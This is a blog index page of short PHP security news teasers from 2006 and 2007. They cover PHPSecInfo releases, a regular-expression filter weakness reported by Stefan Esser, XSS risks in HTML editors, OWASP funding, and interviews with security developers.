PHPSecInfo v0.2.1 Now Available
by Cal Evans (editor) |
0 comments | Friday, April 6, 2007
PhpSecInfo v0.2.1 is now available. It’s primarily a bugfix release, but a fairly significant one.
Stefan Esser Finds Holes in Most preg_match() Filters
by Cal Evans (editor) |
0 comments | Wednesday, April 4, 2007
Stefan Esser posted on his blog today about a problem he has discovered in code that he was auditing recently. The problem he discusses is in the way regular expressions are written and the modifiers that may or may not be applied.
Avoiding XSS security attacks to sites that use HTML editors
by ml |
9 comments | Wednesday, March 7, 2007
HTML editors are special form fields that allow Web site users to visually edit (WYSIWYG) rich text content formatted with HTML tags. HTML editors are powerful, but without proper security care, sites may be abused.
OWASP Spring of Code 2007
by Cal Evans (editor) |
0 comments | Tuesday, March 6, 2007
Chris Shiflett and Laura Thompson both announced on their blogs that during the lightning talks at last night’s PHP Meetup, Andrew van der Stock (executive director of OWASP) announced the Spring of Code 2007. This ambitious effort will distribute $100,000 to worthy projects.
Do Open Source Devs Get Web App Security? Does Anybody?
by coj |
0 comments | Wednesday, February 28, 2007
A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.
PHPSecInfo News
by Cal Evans (editor) |
0 comments | Tuesday, February 27, 2007
Ed Finkler pinged me this morning about a couple of news items relating to PHPSecInfo. Click on inside, I’ll give you the scoop.
PHP Security From The Inside
by Cal Evans (editor) |
0 comments | Wednesday, February 7, 2007
Federico Biancuzzi has published an interesting article at securityfocus.com in which he interviews Stefan Esser. Click on inside, let’s talk about this.
PHPSecInfo: New release (0.1.2), new plans
by Cal Evans (editor) |
0 comments | Saturday, December 23, 2006
Ed Finkler sent out an email yesterday to thousands of his closest friends, announcing the release of the latest version of PHPSecInfo. If your not on his “A” list, click on inside and I’ll share the email with you.
Zeev Suraski Responds to Slashdot Misquote
by Cal Evans (editor) |
2 comments | Thursday, December 14, 2006
In a recent story on slashdot.org about Stefan Esser resigning from the PHP security team, comments were flying fast and furious. Among them was a comment that Zeev Suraski felt misquoted him. Come on inside, I’ll share with you what I know.
Ed Finkler Talks About PHPSecInfo
by Cal Evans (editor) |
1 comment | Saturday, October 21, 2006
Recently the PHP Security Consortium released their latest project phpsecinfo. Phpsecinfo was conceived and written by Ed Finkler who works at CERIAS, the Center for Education and Research in Information Assurance and Security. Intrigued as much by this project, as I was by the fact that Ed wrote me and told me it was time for me to interview him, I called Ed and we talked about the project. Click on inside and read what he had to say.
